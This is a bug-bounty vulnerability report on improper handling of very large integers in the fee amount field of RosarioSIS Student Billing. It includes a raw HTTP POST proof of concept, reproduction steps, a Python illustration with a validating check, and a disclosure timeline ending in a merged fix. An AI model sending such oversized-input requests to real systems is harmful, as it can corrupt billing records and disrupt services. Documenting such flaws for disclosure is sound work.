Improper handling of large integer values in francoisjacquet/rosariosis

Valid

Reported on

May 2nd 2022


Description

In the create Fee function, large integer values in the amount field are handled improperly.

Proof of Concept

POST /demonstration/Modules.php?modname=Student_Billing/StudentFees.php HTTP/1.1
Host: www.rosariosis.org
Cookie: RosarioSIS=kja39eaq6q73envhk6eo8300vgumn2612c5huvue08vgh66faog1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://www.rosariosis.org/demonstration/Modules.php?modname=Student_Billing/StudentFees.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 385
Origin: https://www.rosariosis.org
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

LO_search=&month_values[14][DUE_DATE]=&day_values[14][DUE_DATE]=&year_values[14][DUE_DATE]=&values[14][COMMENTS]=&values[new][TITLE]=ased&values[new][AMOUNT]=9999999999999999999999999&month_values[new][DUE_DATE]=&day_values[new][DUE_DATE]=&year_values[new][DUE_DATE]=&values[new][COMMENTS]=&FILE_ATTACHED=

Steps to reproduce

  • Go to Student Billing
  • Create a new Fee with amount 9999999999999999999999999
  • We can see the server return a larger value than 9999999999999999999999999
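As an added illustration (not code from the report or from RosarioSIS): if the 25-digit amount is parsed as an IEEE-754 double, which is what a PHP float is, it rounds to 1.0E+25 and prints back as 10000000000000000905969664, a larger number than was submitted. The validator below rejects such input before it reaches storage; the limit of 10 integer digits and 2 decimals is an assumed NUMERIC(12,2)-style column, not something the report states.

```python
import re
from decimal import Decimal, InvalidOperation
from urllib.parse import parse_qs

# Constructed from the PoC body above: only the fields for the new fee.
POC_BODY = (
    "values[new][TITLE]=ased"
    "&values[new][AMOUNT]=9999999999999999999999999"
    "&values[new][COMMENTS]="
)

# Assumed storage limit (NUMERIC(12,2)-style): 10 integer digits, 2 decimals.
MAX_INT_DIGITS = 10
MAX_FRACTION_DIGITS = 2
AMOUNT_RE = re.compile(
    r"^-?\d{1,%d}(\.\d{1,%d})?$" % (MAX_INT_DIGITS, MAX_FRACTION_DIGITS)
)


def float_roundtrip(raw: str) -> int:
    """Value a server stores if it parses the amount as a double and
    prints it back as an integer; for the PoC input this is larger
    than what was submitted because 9999999999999999999999999 is not
    representable and rounds up to the nearest double."""
    return int(float(raw))


def validate_amount(raw: str):
    """Return the amount as a Decimal if it fits the assumed column,
    otherwise None. Exponent notation, excess digits and junk are
    all rejected by the regex before any numeric conversion."""
    raw = raw.strip()
    if not AMOUNT_RE.fullmatch(raw):
        return None
    try:
        return Decimal(raw)
    except InvalidOperation:
        return None


def amount_from_body(body: str):
    """Extract values[new][AMOUNT] from a urlencoded body and validate it."""
    fields = parse_qs(body, keep_blank_values=True)
    raw = fields.get("values[new][AMOUNT]", [""])[0]
    return validate_amount(raw)


if __name__ == "__main__":
    print("double round-trip:", float_roundtrip("9999999999999999999999999"))
    print("PoC amount accepted:", amount_from_body(POC_BODY) is not None)
```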

PoC image

(screenshot omitted)

Impact

This vulnerability can cause the website to stop working properly.

We are processing your report and will contact the francoisjacquet/rosariosis team within 24 hours. a month ago
We have contacted a member of the francoisjacquet/rosariosis team and are waiting to hear back 25 days ago
François Jacquet validated this vulnerability 24 days ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
François Jacquet confirmed that a fix has been merged on 386a5e 24 days ago
François Jacquet has been awarded the fix bounty